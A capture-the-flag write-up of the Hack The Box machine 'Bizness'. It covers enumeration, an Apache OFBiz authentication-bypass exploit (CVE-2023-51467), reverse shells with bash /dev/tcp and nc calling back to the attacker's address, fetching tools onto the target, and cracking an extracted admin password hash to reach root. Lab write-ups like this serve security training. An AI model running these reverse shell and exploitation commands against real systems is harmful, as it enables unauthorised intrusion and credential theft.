As always we start with nmap scan:
╭─ ~/ctf/htb/bizness
╰─❯ nmap -sC -sV 10.10.11.252
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-25 14:43 MSK
Nmap scan report for 10.10.11.252 (10.10.11.252)
Host is up (0.054s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
| 256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_ 256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
|_http-server-header: nginx/1.18.0
443/tcp open ssl/http nginx 1.18.0
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Not valid before: 2023-12-14T20:03:40
|_Not valid after: 2328-11-10T20:03:40
|_http-title: Did not follow redirect to https://bizness.htb/
|_ssl-date: TLS randomness does not represent time
|_http-server-header: nginx/1.18.0
| tls-nextprotoneg:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.38 secondsalso ran with
-p-, no extra ports found.
Let’s add
10.10.11.252 bizness.htb to the hosts file.
We run enumeration:
╭─ ~/ctf/htb/bizness
╰─❯ ffuf -w /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt -ic -u http://bizness.htb/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://bizness.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
crack [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 53ms]
10 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 53ms]
08 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 53ms]
1 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 52ms]
archives [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 55ms]
privacy [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 55ms]
serial [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 56ms]
2006 [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 56ms]
blog [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 56ms]
img [Status: 301, Size: 169, Words: 5, Lines: 8, Duration: 55ms]
...Quite interesting, all pages redirect to main page
Let’s filter by size with -fs:
╭─ ~/ctf/htb/bizness 17s
╰─❯ ffuf -w /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt -ic -u http://bizness.htb/FUZZ -fs 169
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://bizness.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 169
________________________________________________Also let’s scan for subdomains:
╭─ ~
╰─❯ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u 'http://bizness.htb' -H "Host: FUZZ.b
izness.tld" -fs 169
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://bizness.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.bizness.tld
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 169
________________________________________________Found absolutely nothing. Let’s explore webpage.
- First of all i check source code. Nothing interesting.
- At the end of page we see some info:
**Powered by Apache OFBiz
**
I’ve never heard of Apache OFBiz. Let’s research about it.
Apache OFBiz is a suite of business applications flexible enough to be used across any industry. A common architecture allows developers to easily extend or enhance it to create custom features.
Interesting. Let’s check it with searchsploit
╭─ ~/ctf/htb/bizness 3m 53s
╰─❯ searchsploit ofbiz
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Apache OFBiz - Admin Creator | multiple/remote/12264.txt
Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/12330.txt
Apache OFBiz - Remote Execution (via SQL Execution) | multiple/remote/12263.txt
Apache OFBiz 10.4.x - Multiple Cross-Site Scripting Vulnerabilities | multiple/remote/38230.txt
Apache OFBiz 16.11.04 - XML External Entity Injection | java/webapps/45673.py
Apache OFBiz 16.11.05 - Cross-Site Scripting | multiple/webapps/45975.txt
Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover) | java/webapps/48408.txt
ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) | java/webapps/50178.sh
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsRCE is the most interesting. Version for it is 17.12.01 but we have no idea which version our machine uses.
Apache OFBiz 17.12.01, released in 2020-03-04, is the first release of the 17.12 series, that has been stabilized since December 2017.
Looks like quite old version, I don’t think this will work.
Searching on the internet I found CVE-2023-51467, that looks quite promising!
Found this exploit PoC on github:
https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass
git clone https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass.git
cd Apache-OFBiz-Authentication-Bypass╭─ ~/ctf/htb/bizness/Apache-OFBiz-Authentication-Bypass master
╰─❯ python3 exploit.py --url http://bizness.htb/
[+] Scanning started...
[+] Apache OFBiz instance seems to be vulnerable.That’s good! Let’s use
--cmd with revshell.
I use https://revshells.com/ to generate revshells.
Setup listener in another terminal:
╭─ ~
╰─❯ nc -lvnp 4444
Listening on 0.0.0.0 4444╭─ ~/ctf/htb/bizness/Apache-OFBiz-Authentication-Bypass master
╰─❯ python3 exploit.py --url http://bizness.htb/ --cmd "/bin/bash -i >& /dev/tcp/10.10.14.56/4444 0>&1"
[+] Generating payload...
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.It didn’t work!
Let’s try uploading nc executable to use with revshell.
Stop the listener and start http server that hosts nc:
╭─ ~/ctf/htb/bizness
╰─❯ nc -lvnp 4444
Listening on 0.0.0.0 4444{ #C}
╭─ ~/ctf/htb/bizness ✘ INT
╰─❯ cp /usr/bin/nc ./
╭─ ~/ctf/htb/bizness
╰─❯ python3 -m http.server 4444
Serving HTTP on 0.0.0.0 port 4444 (http://0.0.0.0:4444/) ...╭─ ~/ctf/htb/bizness/Apache-OFBiz-Authentication-Bypass master
╰─❯ python3 exploit.py --url https://bizness.htb/ --cmd "wget http://10.10.14.56:4444/nc"
[+] Generating payload...
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.Looking to http server logs we see get request, so I assume it worked.
Now let’s use that nc to execute revshell
Again we setup listener:
╭─ ~/ctf/htb/bizness ✘ INT 4s
╰─❯ nc -lvnp 4444
Listening on 0.0.0.0 4444╭─ ~/ctf/htb/bizness/Apache-OFBiz-Authentication-Bypass master
╰─❯ python3 exploit.py --url https://bizness.htb/ --cmd "nc 10.10.14.56 4444 -c /bin/sh"
[+] Generating payload...
[+] Payload generated successfully.
[+] Sending malicious serialized payload...
[+] The request has been successfully sent. Check the result of the command.AND WE GOT CONNECT IN LISTENER!
Let’s stabilize shell:
python3 -c 'import pty;pty.spawn("/bin/bash");'
CTRL+Z
stty raw -echo;fg
export TERM=xterm
Done. Now we have stabilized shell.
ofbiz@bizness:/opt/ofbiz$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
ofbiz:x:1001:1001:,,,:/home/ofbiz:/bin/bashSo we are the only user!
ofbiz@bizness:/opt/ofbiz$ cd
ofbiz@bizness:~$ ls
user.txt
ofbiz@bizness:~$ cat user.txt
<REDACTED>
ofbiz@bizness:~$Got user flag!
I’m quite lazy (and tbh noob) so let’s use LinPEAS to search for privesc.
Setup http server with linpeas on your machine:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
sudo python3 -m http.serverOn target:
wget http://10.10.14.56:8000/linpeas.sh
sh linpeas.shUntitled-3.avif
found writeable services.
ofbiz@bizness:/opt/ofbiz$ cat /etc/systemd/system/multi-user.target.wants/ofbiz.service
# OFBiz service
[Unit]
Description=OFBiz Service
[Service]
Type=simple
# environment variables
Environment="JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64"
Environment="PATH=/usr/lib/jvm/java-11-openjdk-amd64/bin:/bin:/sbin:/usr/bin:/usr/sbin"
User=ofbiz
WorkingDirectory=/opt/ofbiz
# start and stop executables
# note that systemd requires specifying full/absolute path to executables
ExecStart=/opt/ofbiz/gradlew ofbiz
ExecStop=/opt/ofbiz/gradlew "ofbiz --shutdown"
Restart=Always
RestartSec=10s
RemainAfterExit=no
[Install]
WantedBy=multi-user.targetLet’s setup listener
nc -lvnp 4445
On target:
echo 'nc 10.10.14.56 4445 -c /bin/sh' > /opt/ofbiz/gradlew
Sadly it didn’t work cause that service wasn’t called.
LinPEAS did show up files in /opt/ofbiz/runtime/data/derb
let’s search something in the db.
Lets copy all dat files into one for easier research.
cat /opt/ofbiz/runtime/data/derby/ofbiz/seg0/* > /opt/ofbiz/all-texts.txt
ofbiz@bizness:/opt/ofbiz$ strings all-texts.txt | grep SHA
SHA-256
MARSHALL ISLANDS
SHAREHOLDER
SHAREHOLDER
<eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" createdTxStamp="2023-12-16 03:40:23.445" currentPassword="$SHA$REDACTED" enabled="Y" hasLoggedOut="N" lastUpdatedStamp="2023-12-16 03:44:54.272" lastUpdatedTxStamp="2023-12-16 03:44:54.213" requirePasswordChange="N" userLoginId="admin"/>
"$SHA$REDACTED
ofbiz@bizness:/opt/ofbiz$$SHA$REDACTED looks like sha encrypted password!
Found this cracker:
https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker
On our machine:
git clone https://github.com/duck-sec/Apache-OFBiz-SHA1-Cracker.git
cd Apache-OFBiz-SHA1-Cracker╭─ ~/ctf/htb/bizness/Apache-OFBiz-SHA1-Cracker master
╰─❯ python3 OFBiz-crack.py --hash-string '$SHA$REDACTED' --wordlist /usr/share/wordlists/rockyou.txt
[+] Attempting to crack....
Found Password: REDACTED
hash: $SHA$REDACTED
(Attempts: 1478437)
[!] Super, I bet you could log into something with that!Let’s use that password:
ofbiz@bizness:/opt/ofbiz$ su root
Password:
root@bizness:/opt/ofbiz# cat /root/root.txt
<REDACTED>
root@bizness:/opt/ofbiz#We got all the flags!